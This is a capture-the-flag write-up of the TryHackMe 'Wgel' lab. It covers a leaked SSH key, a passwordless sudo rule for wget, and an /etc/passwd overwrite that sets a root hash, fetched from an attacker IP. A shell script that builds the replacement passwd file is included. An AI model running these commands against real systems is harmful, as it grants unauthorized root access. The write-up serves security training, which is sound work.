Wgel on TryHackMe in a nutshell:
1. Found the username jessie in the HTML source of http://target.
2. Found an SSH private key at http://target/sitemap/.ssh/id_rsa.
3. SSH-ed in as jessie with that id_rsa private key.
4. Privilege escalation: linpeas.sh showed that we can run wget via sudo as root without a password. Farewell to security!
5. Generated a hash with mkpasswd -m sha-512 [password], pasted it into the root line of a copy of /etc/passwd (in place of the x in the second field), and served that copy from the attacker box at /var/www/html/passwd.
6. $ sudo wget 1.2.3.4/passwd -O /etc/passwd
7. su to root with the password that was just set.

Key takeaways here:
– With that sudo rule, wget -O writes to any path as root, so the unprivileged user can overwrite any file on the box without the root password.
– Linux authenticates against a password hash placed directly in the second field of /etc/passwd, not only against /etc/shadow; an x in that field is what tells it to look in /etc/shadow instead.
– Key command, run as the unprivileged user: $ sudo wget 1.2.3.4/passwd -O /etc/passwd, then su root.
– mkpasswd generates password hashes in the same crypt format /etc/shadow uses.
– Start from the victim's own /etc/passwd when building the replacement, so every other account survives the overwrite.

Key command syntax:
– mkpasswd -m sha-512 [password], then paste the output in place of the x in the root:x:0:0:… line of your copy of /etc/passwd, giving root:HASH:0:0:…
– From the victim machine: $ sudo wget 10.6.86.14/passwd -O /etc/passwd
– linpeas.sh is golden! (Find it at https://linpeas.sh)
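The steps above and the command syntax both come down to one file edit: put a SHA-512 crypt hash into root's password field of the victim's /etc/passwd and serve the result. This is an added example, not code from the original post, that does that edit with a small shell function and refuses anything that is not a $6$ (sha-512) hash. It assumes the victim's /etc/passwd has already been copied to ./passwd.orig, that the hash came from mkpasswd -m sha-512 (openssl passwd -6 gives the same format), and that the attacker's web root is /var/www/html; the hash value in the usage lines is a constructed placeholder, not a real hash.

```shell
#!/bin/sh
# Added example (not from the original write-up). Builds the replacement
# /etc/passwd for the "sudo wget -O /etc/passwd" privilege escalation.
# Assumptions: ./passwd.orig is a copy of the VICTIM's /etc/passwd (so all
# other accounts keep working after the overwrite), and HASH was produced
# with `mkpasswd -m sha-512 <password>` or `openssl passwd -6 <password>`.

# patch_root_hash SRC HASH DST
# Copies SRC to DST, replacing only the second colon-separated field of the
# root line (normally "x") with HASH. Every other line is copied unchanged.
patch_root_hash() {
    src=$1; hash=$2; dst=$3
    case "$hash" in
        '$6$'*) ;;                                   # sha-512 crypt only
        *) echo "refusing: hash does not start with \$6\$ (sha-512)" >&2
           return 1 ;;
    esac
    # sha512crypt hashes contain only [./0-9A-Za-z$], so -v is safe here
    awk -v h="$hash" 'BEGIN { FS = OFS = ":" } $1 == "root" { $2 = h } { print }' \
        "$src" > "$dst"
}

# root_field FILE N
# Prints field N of the root line of FILE (2 = password field).
root_field() {
    awk -v n="$2" 'BEGIN { FS = ":" } $1 == "root" { print $n }' "$1"
}

# Usage on the attacker box (HASH below is a constructed placeholder):
#   HASH='$6$saltsalt$ReplaceWithRealMkpasswdOutput'
#   patch_root_hash passwd.orig "$HASH" /var/www/html/passwd
#   root_field /var/www/html/passwd 2        # should print the hash back
# Then on the victim, as the unprivileged user:
#   sudo wget http://10.6.86.14/passwd -O /etc/passwd
#   su root                                  # enter the chosen password
```

Keeping the check on the `$6$` prefix matters because a typo in the hash field does not give a helpful error: su just says authentication failed, and since the original /etc/passwd was overwritten there is no second attempt without re-serving the file.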


Greg

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.